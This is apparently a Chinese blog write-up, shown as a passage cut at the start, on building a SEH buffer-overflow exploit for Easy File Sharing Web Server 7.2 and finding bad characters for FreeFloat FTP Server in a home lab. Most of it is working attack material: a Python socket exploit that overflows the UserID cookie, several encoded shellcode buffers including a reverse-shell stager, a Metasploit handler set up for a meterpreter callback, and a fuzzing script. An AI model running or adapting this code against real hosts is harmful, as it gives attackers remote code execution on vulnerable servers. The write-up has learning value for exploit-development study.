buf += b"\xc9\xb1\x59\x31\x5a\x14\x03\x5a\x14\x83\xc2\x04\x13"
buf += b"\x88\x58\x68\x5c\x73\xa1\x69\x02\x45\x73\xe0\x27\xc1"
buf += b"\xf8\xa1\x97\x81\xad\x49\x5c\xc7\x45\x63\x9d\xe7\xd2"
buf += b"\xc9\x47\x73\x6e\xe6\xb6\x43\x23\xca\xd9\x3f\x3e\x1f"
buf += b"\x39\x01\xf1\x52\x38\x46\x47\x18\xd5\x1a\x0f\x69\x7b"
buf += b"\x8b\x24\x2f\x47\xaa\xea\x3b\xf7\xd4\x8f\xfc\x83\x68"
buf += b"\x91\x2c\xe0\x29\xb1\xcd\x25\x42\xf9\xd5\x99\xd0\x33"
buf += b"\x91\x25\xea\x3c\x13\xde\x38\x48\xa5\x36\x71\x8e\x67"
buf += b"\x79\x7f\xa2\x69\x42\xb8\x5a\x1c\xb8\xba\xe7\x27\x7b"
buf += b"\xc0\x33\xad\x9b\x62\xb7\x15\x7f\x92\x14\xc3\xf4\x98"
buf += b"\xd1\x87\x52\xbd\xe4\x44\xe9\xb9\x6d\x6b\x3d\x48\x35"
buf += b"\x48\x99\x10\xed\xf1\xb8\xfc\x40\x0d\xda\x59\x3c\xab"
buf += b"\x91\x48\x2b\xcb\x5a\x93\x54\x91\xcc\x5f\x99\x2a\x0c"
buf += b"\xc8\xaa\x59\x3e\x57\x01\xf6\x72\x10\x8f\x01\x03\x36"
buf += b"\x30\xdd\xab\x57\xce\xde\xcb\x7e\x15\x8a\x9b\xe8\xbc"
buf += b"\xb3\x70\xe9\x41\x66\xec\xe3\xd5\x49\x58\x16\xa0\x22"
buf += b"\x9a\xd9\xb8\x3b\x13\x3f\xee\x6b\x73\x90\x4f\xdc\x33"
buf += b"\x40\x38\x36\xbc\xbf\x58\x39\x17\xa8\xf3\xd6\xc1\x80"
buf += b"\x6b\x4e\x48\x5a\x0d\x8f\x47\x26\x0d\x1b\x6d\xd6\xc0"
buf += b"\xec\x04\xc4\x35\x8b\xe6\x14\xc6\x3e\xe6\x7e\xc2\xe8"
buf += b"\xb1\x16\xc8\xcd\xf5\xb8\x33\x38\x86\xbf\xcc\xbd\xbe"
buf += b"\xb4\xfb\x2b\xfe\xa2\x03\xbc\xfe\x32\x52\xd6\xfe\x5a"
buf += b"\x02\x82\xad\x7f\x4d\x1f\xc2\xd3\xd8\xa0\xb2\x80\x4b"
buf += b"\xc9\x38\xfe\xbc\x56\xc3\xd5\xbe\x91\x3b\xab\xe8\x39"
buf += b"\x53\x53\xa9\xb9\xa3\x39\x29\xea\xcb\xb6\x06\x05\x3b"
buf += b"\x36\x8d\x4e\x53\xbd\x40\x3c\xc2\xc2\x48\xe0\x5a\xc2"
buf += b"\x7f\x39\x6d\xb9\xf0\xbe\x8e\x3e\x19\xdb\x8f\x3e\x25"
buf += b"\xdd\xac\xe8\x1c\xab\xf3\x28\x1b\xa4\x46\x0c\x0a\x2f"
buf += b"\xa8\x02\x4c\x7a"
把以上内容放置脚本中。注意,这里我更换了脚本,不再是之前的request,而是socket。不同坏字符的结果也有贴在注释里。代码是
searchsploit easy file sharing
不要重复造轮子也是好的。
#!/usr/bin/env python
# Easy File Sharing Web Server v7.2 Remote SEH Based Overflow
# The buffer overwrites ebx with 750+ offset, when sending 4059 it overwrites the EBX
# vulnerable file /changeuser.ghp > Cookies UserID=[buf]
# Means there are two ways to exploit changeuser.ghp
# Tested on Win7 x64 and x86, it should work on win8/win10
# By Audit0r
# https://twitter.com/Audit0rSA
import sys, socket, struct
if len(sys.argv) <= 1:
print "Usage: python efsws.py [host] [port]"
exit()
host = sys.argv[1]
port = int(sys.argv[2])
# https://code.google.com/p/win-exec-calc-shellcode/
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
"\x1c\x39\xbd"
)
#"\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e" 2022/10/05 --> success
buf = b""
buf += b"\x31\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += b"\x76\x0e\x05\x9a\xbb\x94\x83\xee\xfc\xe2\xf4\xf9\x72"
buf += b"\x34\x94\x05\x9a\xdb\xa5\xd7\xfe\x30\xc6\x35\x13\x5e"
buf += b"\x1f\x57\x96\x30\xc6\x11\xab\x44\x1f\x77\xb2\xb4\x23"
buf += b"\x4f\xbc\x8a\x54\xa9\xa6\xda\xe8\x07\xb6\x9b\x55\xca"
buf += b"\x97\xba\x53\x4c\xef\x54\xc6\x52\x11\xe9\x84\x8e\xd8"
buf += b"\x87\x95\xd5\x11\xfb\xec\x80\x5a\xcf\xd8\x04\x4a\x30"
buf += b"\xdc\x1d\x11\xe3\xb4\x04\x49\xeb\x11\xcc\xee\x87\xdd"
buf += b"\x34\x65\x30\xa0\x8e\x9b\x6d\xa5\xc5\x36\x7a\x5b\x08"
buf += b"\x9b\x7c\xac\xe5\xef\x4f\x97\x78\x62\x80\xe9\x21\xef"
buf += b"\x5b\xcc\x8e\xc2\x9f\x95\xd6\xfc\x30\x98\x4e\x11\xe3"
buf += b"\x88\x04\x49\x30\x90\x8e\x9b\x6b\x1d\x41\xbe\x9f\xcf"
buf += b"\x5e\xfb\xe2\xce\x54\x65\x5b\xcc\x5a\xc0\x30\x86\xec"
buf += b"\x1a\x44\x6b\xfa\xc7\xd3\xa7\x37\x9a\xbb\xfc\x72\xe9"
buf += b"\x89\xcb\x51\xf2\xf7\xe3\x23\x9d\x32\x7c\xfa\x4a\x03"
buf += b"\x04\x04\x9a\xbb\xbd\xc1\xce\xeb\xfc\x2c\x1a\xd0\x94"
buf += b"\xfa\x4f\xd1\x9e\x6d\x5a\x13\x71\x80\xf2\xb9\x94\x16"
buf += b"\x13\x32\x72\x55\xca\xeb\xc4\x45\xca\xfb\xc4\x6d\x70"
buf += b"\xb4\x4b\xe5\x65\x6e\x03\x6f\x8a\xed\xc3\x6d\x03\x1e"
buf += b"\xe0\x64\x65\x6e\x11\xc5\xee\xb1\x6b\x4b\x92\xce\x78"
buf += b"\xed\xfd\xbb\x94\x05\xf0\xbb\xfe\x01\xcc\xec\xfc\x07"
buf += b"\x43\x73\xcb\xfa\x4f\x38\x6c\x05\xe4\x8d\x1f\x33\xf0"
buf += b"\xfb\xfc\x05\x8a\xbb\x94\x53\xf0\xbb\xfc\x5d\x3e\xe8"
buf += b"\x71\xfa\x4f\x28\xc7\x6f\x9a\xed\xc7\x52\xf2\xb9\x4d"
buf += b"\xcd\xc5\x44\x41\x86\x62\xbb\xe9\x2d\xc2\xd3\x94\x45"
buf += b"\x9a\xbb\xfe\x05\xca\xd3\x9f\x2a\x95\x8b\x6b\xd0\xcd"
buf += b"\xd3\xe1\x6b\xd7\xda\x6b\xd0\xc4\xe5\x6b\x09\xbe\xb4"
buf += b"\x11\x75\x65\x44\x6b\xec\x01\x44\x6b\xfa\x9b\x78\xbd"
buf += b"\xc3\xef\x7a\x57\xbe\x6a\x0e\x36\x53\xf0\xbb\xc7\xfa"
buf += b"\x4f\xbb\x94"
# !mona bytearray -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b" 2022/10/04 --> success
buf = b""
buf += b"\x31\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += b"\x76\x0e\x9a\xab\x1e\x98\x83\xee\xfc\xe2\xf4\x66\x43"
buf += b"\x91\x98\x9a\xab\x7e\xa9\x48\xcf\x95\xca\xaa\x22\xfb"
buf += b"\x13\xc8\xa7\x95\xca\x8e\x20\x6c\xb0\x95\x1c\x54\xbe"
buf += b"\xab\x54\x2f\x58\x36\x97\x7f\xe4\x98\x87\x3e\x59\x55"
buf += b"\xa6\x1f\x5f\xd3\xde\xf1\xca\x11\xf9\x0e\x13\xd8\x97"
buf += b"\x1f\x48\xcd\x20\x5e\xe0\x1f\x6b\x6a\xd4\x9b\x7b\x4e"
buf += b"\x13\xc2\x8b\x1f\x4b\x11\xe3\x06\x1d\x53\xdf\x22\xa9"
buf += b"\x65\xe2\x95\xac\x11\xaa\xc8\xa9\x5a\x07\xdf\x57\x97"
buf += b"\xaa\xd9\xa0\x7a\xde\xea\x9b\xe7\x53\x25\xe5\xbe\xde"
buf += b"\xfe\xc0\x11\xf3\x3a\x99\x49\xcd\x95\x94\xd1\x20\x46"
buf += b"\x84\x9b\x78\x95\x9c\x11\xaa\xce\x11\xde\x8f\x3a\xc3"
buf += b"\xc1\xca\x47\xc2\xcb\x54\xfe\xc0\xc5\xf1\x95\x8a\x73"
buf += b"\x2b\xe1\x67\x65\xf6\x76\xab\xa8\xab\x1e\xf0\xed\xd8"
buf += b"\x2c\xc7\xce\xc3\x52\xef\xbc\xac\x97\x70\x65\x7b\xa6"
buf += b"\x08\x9b\xab\x1e\xb1\x5e\xff\x4e\xf0\xb3\x2b\x75\x98"
buf += b"\x65\x7e\x74\x92\xf2\x6b\xb6\x7d\x1f\xc3\x1c\x98\x89"
buf += b"\x22\x97\x7e\xca\xfb\x4e\xc8\xda\xfb\x5e\xc8\xf2\x41"
buf += b"\x11\x47\x7a\x54\xcb\x0f\xf0\xbb\x48\xcf\xf2\x32\xbb"
buf += b"\xec\xfb\x54\xcb\x1d\x5a\xdf\x14\x67\xd4\xa3\x6b\x74"
buf += b"\x72\xcc\x1e\x98\x9a\xc1\x1e\xf2\x9e\xfd\x49\xf0\x98"
buf += b"\x72\xd6\xc7\x65\x7e\x9d\x60\x9a\xd5\x28\x13\xac\xc1"
buf += b"\x5e\xf0\x9a\xbb\x1e\x98\xcc\xc1\x1e\xf0\xc2\x0f\x4d"
buf += b"\x7d\x65\x7e\x8d\xcb\xf0\xab\x48\xcb\xcd\xc3\x1c\x41"
buf += b"\x52\xf4\xe1\x4d\x19\x53\x1e\xe5\xb2\xf3\x76\x98\xda"
buf += b"\xab\x1e\xf2\x9a\xfb\x76\x93\xb5\xa4\x2e\x67\x4f\xfc"
buf += b"\x76\xed\xf4\xe6\x7f\x67\x4f\xf5\x40\x67\x96\x8f\x11"
buf += b"\x1d\xea\x54\xe1\x67\x73\x30\xe1\x67\x65\xaa\xdd\xb1"
buf += b"\x5c\xde\xdf\x5b\x21\x5b\xab\x3a\xcc\xc1\x1e\xcb\x65"
buf += b"\x7e\x1e\x98"
# !mona bytearray -b "\x00\x0a\x01\x02\x03\x04\x0d\x3b" 2022/10/05 --> success
buf = b""
buf += b"\x29\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += b"\x76\x0e\xb2\xf6\x2c\x9e\x83\xee\xfc\xe2\xf4\x4e\x1e"
buf += b"\xa3\x9e\xb2\xf6\x4c\x17\x57\xc7\xfe\xfa\x39\xa4\x1c"
buf += b"\x15\xe0\xfa\xa7\xcc\xa6\xc7\xd3\x15\xc0\xde\x23\x29"
buf += b"\xf8\xd0\x1d\x5e\x1e\xca\x4d\xe2\xb0\xda\x0c\x5f\x7d"
buf += b"\xfb\x2d\x59\xfb\x83\xc3\xcc\x39\xa4\x3c\x15\xf0\xca"
buf += b"\x7b\x9f\x62\x7d\x6c\xe6\x37\x36\x58\xd2\xb3\x26\xa7"
buf += b"\xc6\x92\x7d\x64\x86\xb3\x25\x7c\x1b\x7b\x82\x10\xd7"
buf += b"\x39\xc2\xa7\x9f\x64\xc7\xd3\xaf\x72\x37\xe3\x93\x1e"
buf += b"\xf7\xeb\xa6\x52\x83\xd8\x9d\xcf\x0e\x17\xe3\x96\x83"
buf += b"\xcc\xc6\x39\xae\x08\x9f\x61\x90\xa7\x92\xf9\x7d\x74"
buf += b"\x82\xb3\x25\xa7\x9a\x39\xf7\xfc\x17\xf6\xd2\x08\xc5"
buf += b"\xe9\x97\x75\xc4\xe3\x09\xcc\xc6\xed\xac\xa7\x8c\x5b"
buf += b"\x76\xd3\x61\x4d\xab\x44\xad\x80\xf6\x2c\xf6\xc5\x85"
buf += b"\x1e\xc1\xe6\x9e\x60\xe9\x94\xf1\xa5\x76\x4d\x26\x94"
buf += b"\x0e\xb3\xf6\x2c\xb7\x76\xa2\x7c\xf6\x9b\x76\x47\x9e"
buf += b"\x4d\x23\x46\x94\xda\x36\x84\x7b\x37\x9e\x2e\x9e\xa1"
buf += b"\x7f\xa5\x78\xe2\xa6\x7c\xce\xf2\xa6\x6c\xce\xda\x1c"
buf += b"\x23\x41\x52\x09\xf9\x09\xd8\xe6\x7a\xc9\xda\x6f\x89"
buf += b"\xea\xd3\x09\xf9\x1b\x72\x82\x26\x61\xfc\xfe\x59\x72"
buf += b"\x5a\x91\x2c\x9e\xb2\x9c\x2c\xf4\xb6\xa0\x7b\xf6\xb0"
buf += b"\x2f\xe4\xc1\x4d\x23\xaf\x66\xb2\x88\x1a\x15\x84\x9c"
buf += b"\x6c\xf6\xb2\xe6\x2c\x9e\xe4\x9c\x2c\xf6\xea\x52\x7f"
buf += b"\x7b\x4d\x23\xbf\xcd\xd8\xf6\x7a\xcd\xe5\x9e\x2e\x47"
buf += b"\x7a\xa9\xd3\x4b\x31\x0e\x2c\xe3\x9a\xae\x44\x9e\xf2"
buf += b"\xf6\x2c\xf4\xb2\xa6\x44\x95\x9d\xf9\x1c\x61\x67\xa1"
buf += b"\x44\xeb\xdc\xbb\x4d\x61\x67\xa8\x72\x61\xbe\xd2\x23"
buf += b"\x1b\xc2\x09\xd3\x61\x5b\x6d\xd3\x61\x4d\xf7\xef\xb7"
buf += b"\x74\x83\xed\x5d\x09\x06\x99\x3c\xe4\x9c\x2c\xcd\x4d"
buf += b"\x23\x2c\x9e"
#2022/10/05 test not badchar--> fail
buf = b""
buf += b"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b"
buf += b"\x52\x30\x8b\x52\x0c\x8b\x52\x14\x31\xff\x0f\xb7\x4a"
buf += b"\x26\x8b\x72\x28\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"
buf += b"\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52\x8b\x52\x10\x57"
buf += b"\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01"
buf += b"\xd0\x8b\x48\x18\x50\x8b\x58\x20\x01\xd3\x85\xc9\x74"
buf += b"\x3c\x49\x31\xff\x8b\x34\x8b\x01\xd6\x31\xc0\xac\xc1"
buf += b"\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d"
buf += b"\x24\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b"
buf += b"\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
buf += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
buf += b"\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00\x00\x68"
buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff"
buf += b"\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"
buf += b"\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xe5\x85\x68\x02"
buf += b"\x00\x13\x89\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
buf += b"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68"
buf += b"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08"
buf += b"\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57"
buf += b"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b"
buf += b"\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
buf += b"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68"
buf += b"\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff"
buf += b"\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c"
buf += b"\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01"
buf += b"\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00"
buf += b"\x53\xff\xd5"
#2022/10/05 test "\x00\x0a" --> success
buf = b""
buf += b"\xb8\xed\xc4\xa1\xea\xd9\xeb\xd9\x74\x24\xf4\x5e\x2b"
buf += b"\xc9\xb1\x59\x31\x46\x14\x83\xee\xfc\x03\x46\x10\x0f"
buf += b"\x31\x5d\x02\x40\xba\x9e\xd3\x3e\x8a\x4c\xb7\x35\xbe"
buf += b"\x40\xb3\x1b\x33\x2a\x91\x8f\xc2\xc9\x27\x50\xdb\xa6"
buf += b"\x02\x88\x6f\xba\xba\xe5\xaf\x97\x87\x64\x4c\xea\xdb"
buf += b"\x46\x6d\x25\x2e\x87\xaa\xf3\x44\x68\x66\x53\x2c\x24"
buf += b"\x97\xd0\x70\xf4\x96\x36\xff\x44\xe1\x33\xc0\x30\x5d"
buf += b"\x3d\x11\x33\x15\x25\xc1\xc8\xfe\x75\xe0\x1d\x7b\xbc"
buf += b"\x96\x9d\xb5\xc0\x1e\x56\x81\xb5\xa0\xbe\xdb\x09\x0e"
buf += b"\xff\xd3\x87\x4e\x38\xd3\x77\x25\x32\x27\x05\x3e\x81"
buf += b"\x55\xd1\xcb\x15\xfd\x92\x6c\xf1\xff\x77\xea\x72\xf3"
buf += b"\x3c\x78\xdc\x10\xc2\xad\x57\x2c\x4f\x50\xb7\xa4\x0b"
buf += b"\x77\x13\xec\xc8\x16\x02\x48\xbe\x27\x54\x34\x1f\x82"
buf += b"\x1f\xd7\x76\xb2\xe0\x27\x77\xee\x76\xeb\xba\x11\x86"
buf += b"\x63\xcc\x62\xb4\x2c\x66\xed\xf4\xa5\xa0\xea\x8d\xa2"
buf += b"\x52\x24\x35\xa2\xac\xc5\x45\xea\x6a\x91\x15\x84\x5b"
buf += b"\x9a\xfe\x54\x63\x4f\x6a\x5f\xf3\xb0\xc2\xba\x86\x59"
buf += b"\x10\x45\x9a\x10\x9d\xa3\xcc\x72\xcd\x7b\xad\x22\xad"
buf += b"\x2b\x45\x29\x22\x13\x75\x52\xe9\x3c\x1c\xbd\x47\x14"
buf += b"\x89\x24\xc2\xee\x28\xa8\xd9\x8a\x6b\x22\xeb\x6b\x25"
buf += b"\xc3\x9e\x7f\x52\xb4\x60\x80\xa3\x51\x60\xea\xa7\xf3"
buf += b"\x37\x82\xa5\x22\x7f\x0d\x55\x01\xfc\x4a\xa9\xd4\x34"
buf += b"\x20\x9c\x42\x78\x5e\xe1\x82\x78\x9e\xb7\xc8\x78\xf6"
buf += b"\x6f\xa9\x2b\xe3\x6f\x64\x58\xb8\xe5\x87\x08\x6c\xad"
buf += b"\xef\xb6\x4b\x99\xaf\x49\xbe\x99\xa8\xb5\x3c\xb6\x10"
buf += b"\xdd\xbe\x86\xa0\x1d\xd5\x06\xf1\x75\x22\x28\xfe\xb5"
buf += b"\xcb\xe3\x57\xdd\x46\x62\x15\x7c\x56\xaf\xfb\x20\x57"
buf += b"\x5c\x20\xd3\x22\x2d\xd7\x14\xd3\x27\xbc\x15\xd3\x47"
buf += b"\xc2\x2a\x05\x7e\xb0\x6d\x95\xc5\xcb\xd8\xb8\x6c\x46"
buf += b"\x22\xee\x6f\x43"
#2022/10/05 test "\x00" --> fail
buf = b""
buf += b"\xbb\xf1\x7d\xa4\x80\xdb\xd1\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x59\x31\x5a\x14\x03\x5a\x14\x83\xc2\x04\x13"
buf += b"\x88\x58\x68\x5c\x73\xa1\x69\x02\x45\x73\xe0\x27\xc1"
buf += b"\xf8\xa1\x97\x81\xad\x49\x5c\xc7\x45\x63\x9d\xe7\xd2"
buf += b"\xc9\x47\x73\x6e\xe6\xb6\x43\x23\xca\xd9\x3f\x3e\x1f"
buf += b"\x39\x01\xf1\x52\x38\x46\x47\x18\xd5\x1a\x0f\x69\x7b"
buf += b"\x8b\x24\x2f\x47\xaa\xea\x3b\xf7\xd4\x8f\xfc\x83\x68"
buf += b"\x91\x2c\xe0\x29\xb1\xcd\x25\x42\xf9\xd5\x99\xd0\x33"
buf += b"\x91\x25\xea\x3c\x13\xde\x38\x48\xa5\x36\x71\x8e\x67"
buf += b"\x79\x7f\xa2\x69\x42\xb8\x5a\x1c\xb8\xba\xe7\x27\x7b"
buf += b"\xc0\x33\xad\x9b\x62\xb7\x15\x7f\x92\x14\xc3\xf4\x98"
buf += b"\xd1\x87\x52\xbd\xe4\x44\xe9\xb9\x6d\x6b\x3d\x48\x35"
buf += b"\x48\x99\x10\xed\xf1\xb8\xfc\x40\x0d\xda\x59\x3c\xab"
buf += b"\x91\x48\x2b\xcb\x5a\x93\x54\x91\xcc\x5f\x99\x2a\x0c"
buf += b"\xc8\xaa\x59\x3e\x57\x01\xf6\x72\x10\x8f\x01\x03\x36"
buf += b"\x30\xdd\xab\x57\xce\xde\xcb\x7e\x15\x8a\x9b\xe8\xbc"
buf += b"\xb3\x70\xe9\x41\x66\xec\xe3\xd5\x49\x58\x16\xa0\x22"
buf += b"\x9a\xd9\xb8\x3b\x13\x3f\xee\x6b\x73\x90\x4f\xdc\x33"
buf += b"\x40\x38\x36\xbc\xbf\x58\x39\x17\xa8\xf3\xd6\xc1\x80"
buf += b"\x6b\x4e\x48\x5a\x0d\x8f\x47\x26\x0d\x1b\x6d\xd6\xc0"
buf += b"\xec\x04\xc4\x35\x8b\xe6\x14\xc6\x3e\xe6\x7e\xc2\xe8"
buf += b"\xb1\x16\xc8\xcd\xf5\xb8\x33\x38\x86\xbf\xcc\xbd\xbe"
buf += b"\xb4\xfb\x2b\xfe\xa2\x03\xbc\xfe\x32\x52\xd6\xfe\x5a"
buf += b"\x02\x82\xad\x7f\x4d\x1f\xc2\xd3\xd8\xa0\xb2\x80\x4b"
buf += b"\xc9\x38\xfe\xbc\x56\xc3\xd5\xbe\x91\x3b\xab\xe8\x39"
buf += b"\x53\x53\xa9\xb9\xa3\x39\x29\xea\xcb\xb6\x06\x05\x3b"
buf += b"\x36\x8d\x4e\x53\xbd\x40\x3c\xc2\xc2\x48\xe0\x5a\xc2"
buf += b"\x7f\x39\x6d\xb9\xf0\xbe\x8e\x3e\x19\xdb\x8f\x3e\x25"
buf += b"\xdd\xac\xe8\x1c\xab\xf3\x28\x1b\xa4\x46\x0c\x0a\x2f"
buf += b"\xa8\x02\x4c\x7a"
shellcode = str(buf)
print "[+]Connecting to" + host
craftedreq = "A"*4059
craftedreq += "\xeb\x06\x90\x90" # basic SEH jump
craftedreq += struct.pack("<I", 0x10017743) # pop commands from ImageLoad.dll
craftedreq += "\x90"*40 # NOPer
craftedreq += shellcode
craftedreq += "C"*50 # filler
httpreq = (
#"GET /changeuser.ghp HTTP/1.1\r\n"
#"User-Agent: Mozilla/4.0\r\n"
#"Host:" + host + ":" + str(port) + "\r\n"
#"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
#"Accept-Language: en-us\r\n"
#"Accept-Encoding: gzip, deflate\r\n"
#"Referer: http://" + host + "/\r\n"
#"Cookie: SESSIONID=6771; UserID=" + craftedreq + "; PassWD=;\r\n"
"Conection: Keep-Alive\r\n\r\n"
"POST /forum.ghp HTTP/1.1\r\n"
#"GET /changeuser.ghp HTTP/1.1\r\n"
"Host:" + host + ":80\r\n"
"User-Agent: python-requests/2.27.1\r\n"
"Accept-Encoding: gzip, deflate, br\r\n"
"Accept: */*\r\n"
"Connection: keep-alive\r\n"
"Cookie: PassWD=kali; SESSIONID=25553; UserID=" + craftedreq + "\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"frmLogin=True&frmUserName=kali&frmUserPass=kali&login=Login\r\n"
)
print "[+]Sending the Calc...."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(httpreq)
s.close()
打开Metasploit,启动一个主控端,这里的
[*] Starting persistent handler(s)...
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_httcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST 192.168.229.133
LHOST => 192.168.229.133
msf6 exploit(multi/handler) > set LPORT 5001
LPORT => 5001
msf6 exploit(multi/handler) > run
成功!
写在最后
因为坏字符之前书中只是一带而过,没有具体说明Mona的用法,所以针对Kali Linux 基于FreeFloat FTP Server编写漏洞渗透模块(下)重新找一遍坏字符
FreeFloat FTP Server里坏字符
根据上面的流程,先从简单的入手,不考虑SEH 强开下,把之前笔记里的坏字符重新找了一遍,Kali Linux 基于FreeFloat FTP Server编写漏洞渗透模块 (上)
这里特别说明下,坏字符确认时候全A,B,的意义是更加方便的找到需要定位的地方。所以方才代码里的jmp esp替换掉,同时NOP不要。
import socket
shellcode = b"\x41"*230 + b"\x42"*4
# !mona bytearray -b "\x00\x0a\x0d\x40"
bad = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
shellcode += bad
data = b"USER " + shellcode + b"\r\n"
s = socket.socket()
connect = s.connect(('192.168.229.135',21))
s.send(data)
s.close()
比如ESP地址,这里并不是0186FC00,而是0186FBF8.因为BBBB之后的坏字符全部为我们填充的,一定要注意,否则mona搜出来的结果不一定对!
重复以上工作。直到找到全部的坏字符。\x00\x0a\x0d\x40
参考
缓冲区溢出流程
黑客脚本练习(基于python编写缓冲区溢出脚本)
用脚本小子的方法学习缓冲区溢出漏洞3
Kali学习笔记22:缓冲区溢出漏洞利用实验
DevOps windows系统安全之slmail缓冲区溢出漏洞复现
ECX寄存器,EAX寄存器
扫一扫
648
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
